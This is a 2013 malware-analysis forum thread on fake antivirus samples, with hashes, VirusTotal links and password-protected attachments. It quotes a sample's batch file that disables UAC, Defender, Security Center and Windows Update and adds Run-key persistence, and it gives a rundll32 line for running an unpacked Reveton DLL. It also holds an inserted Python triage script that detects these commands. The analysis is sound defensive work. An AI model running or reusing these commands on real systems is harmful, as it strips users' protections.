A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #20233  by p4r4n0id
 Sat Jul 27, 2013 8:07 am
attached!
Attachments
pwd: infected
(474.32 KiB) Downloaded 85 times
 #20236  by Xylitol
 Sat Jul 27, 2013 12:52 pm
Attachments
infected
(474.48 KiB) Downloaded 89 times
 #20334  by Cody Johnston
 Thu Aug 01, 2013 8:45 pm
Attentive Antivirus

Image

There were a few other goodies packaged with this as well

There are some other files in here as well:

1. 3X9DV7p6.exe
MD5: e7a7fb4d2c8b8d9594582618f099e337
https://www.virustotal.com/en/file/2691 ... 375387434/

2. 1891695800740633560.exe
MD5: c9d3ab7fa4d7ab64acebfa518ecb88bb
https://www.virustotal.com/en/file/2ac4 ... 375387391/

Some batch file found in the folder (Mad Skillz):
Code:
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v EnableLUA /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v EnableVirtualization /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v RPSessionInterval /t REG_DWORD /d 0 /f
sc stop windefend
sc stop msmpsvc
sc stop wuauserv
sc stop wscsvc
ping localhost -w 1000 -n 3 > nul
sc config windefend start= disabled
sc config msmpsvc start= disabled
sc config wuauserv start= disabled
sc config wscsvc start= disabled
sc config luafv start= disabled
ping localhost -w 1000 -n 2 > nul
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v MSASCui /f
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Defender" /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v AA2014 /t REG_SZ /d C:\ProgramData\3X9DV7p6\3X9DV7p6.exe
There are other files in the attachment, but those are the most interesting.
Attachments
Password: infected
(689.95 KiB) Downloaded 103 times
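As an added, defender-side example (not code from the thread or from any of its posters): a small Python triage script that scans a batch file for the kind of tampering the script above performs, namely disabling UAC and UAC virtualization, switching off System Restore checkpoints, stopping and disabling Defender, Security Center and Windows Update, removing security-product autostart entries, and planting a Run-key persistence entry. The service list, registry suffixes and tactic labels are assumptions chosen for this example; the sample script is the batch file quoted in the post.

```python
"""Triage a Windows batch script for commands that weaken host protections.

Added example for this thread, not code from the posters. Everything below is
a heuristic: the registry values and service names it knows about are the ones
abused by the batch file in the post, plus a few obvious neighbours.
"""
import re
from collections import Counter

# Registry values that disable a protection when set to 0: (key suffix, value name) -> label
TAMPER_REG_VALUES = {
    (r"policies\system", "enablelua"): "UAC disabled (EnableLUA=0)",
    (r"policies\system", "enablevirtualization"): "UAC file/registry virtualization disabled",
    (r"systemrestore", "rpsessioninterval"): "System Restore checkpoints disabled",
}

# Services whose stop/disable is a strong defense-evasion signal (assumed list)
SECURITY_SERVICES = {
    "windefend": "Windows Defender service",
    "msmpsvc": "Microsoft Antimalware service",
    "wuauserv": "Windows Update service",
    "wscsvc": "Security Center service",
    "luafv": "UAC virtualization filter driver",
}

RUN_KEY_SUFFIX = r"\currentversion\run"


def _tokens(line):
    """Split a cmd.exe line into tokens, keeping quoted paths intact and unquoting them."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', line)]


def _opt(tokens, flag):
    """Return the argument following a reg.exe switch such as /v or /d, or ''."""
    for i, t in enumerate(tokens[:-1]):
        if t.lower() == flag:
            return tokens[i + 1]
    return ""


def analyze_line(line):
    """Return (tactic, detail) if the line tampers with a protection, else None."""
    tok = _tokens(line)
    if len(tok) < 3:
        return None
    cmd, action = tok[0].lower(), tok[1].lower()
    if cmd == "reg":
        key, name, data = tok[2].lower(), _opt(tok, "/v"), _opt(tok, "/d")
        if action == "add":
            for (suffix, value_name), label in TAMPER_REG_VALUES.items():
                if key.endswith(suffix) and name.lower() == value_name and data == "0":
                    return ("defense-evasion", label)
            if key.endswith(RUN_KEY_SUFFIX):
                return ("persistence", f"Run key entry '{name}' -> {data}")
        if action == "delete" and key.endswith(RUN_KEY_SUFFIX):
            return ("defense-evasion", f"Run key entry '{name}' removed")
    elif cmd == "sc":
        svc = tok[2].lower()
        if svc in SECURITY_SERVICES:
            if action == "stop":
                return ("defense-evasion", f"{SECURITY_SERVICES[svc]} stopped")
            if action == "config" and "disabled" in (t.lower() for t in tok[3:]):
                return ("defense-evasion", f"{SECURITY_SERVICES[svc]} disabled at boot")
    return None


def triage(script_text):
    """Return [(line_no, tactic, detail), ...] for every flagged line in the script."""
    findings = []
    for no, line in enumerate(script_text.splitlines(), start=1):
        hit = analyze_line(line.strip())
        if hit:
            findings.append((no, hit[0], hit[1]))
    return findings


def summarize(findings):
    """Count findings per tactic, e.g. {'defense-evasion': 14, 'persistence': 1}."""
    return dict(Counter(tactic for _, tactic, _ in findings))


# The batch file quoted in the post above, used here as the sample input.
SAMPLE_SCRIPT = r"""
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v EnableLUA /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v EnableVirtualization /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v RPSessionInterval /t REG_DWORD /d 0 /f
sc stop windefend
sc stop msmpsvc
sc stop wuauserv
sc stop wscsvc
ping localhost -w 1000 -n 3 > nul
sc config windefend start= disabled
sc config msmpsvc start= disabled
sc config wuauserv start= disabled
sc config wscsvc start= disabled
sc config luafv start= disabled
ping localhost -w 1000 -n 2 > nul
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v MSASCui /f
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Defender" /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v AA2014 /t REG_SZ /d C:\ProgramData\3X9DV7p6\3X9DV7p6.exe
"""

if __name__ == "__main__":
    hits = triage(SAMPLE_SCRIPT)
    for no, tactic, detail in hits:
        print(f"line {no:2d} [{tactic}] {detail}")
    print(summarize(hits))
```

Run against the quoted batch file it reports 15 flagged lines: 14 tagged defense-evasion and the single Run-key write tagged persistence; the two `ping` sleep lines are ignored. The same `analyze_line` function can be pointed at Sysmon or EDR process-creation events that carry a `reg.exe`/`sc.exe` command line, which is where a detection for this behaviour would normally live.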
 #20345  by ISergey256
 Fri Aug 02, 2013 1:09 pm
Live Security Professional
to run -> rundll32 DUMP_003E0000-003EF000_unpack_reveton.dll, XFG00

original https://www.virustotal.com/ru/file/410f ... /analysis/
unpacked https://www.virustotal.com/ru/file/2f8c ... /analysis/
fakeav memory dump https://www.virustotal.com/ru/file/3f12 ... /analysis/

activation code F9292-QRT38-U9291-29291-3923F
Attachments
pass: infected
(1008.22 KiB) Downloaded 104 times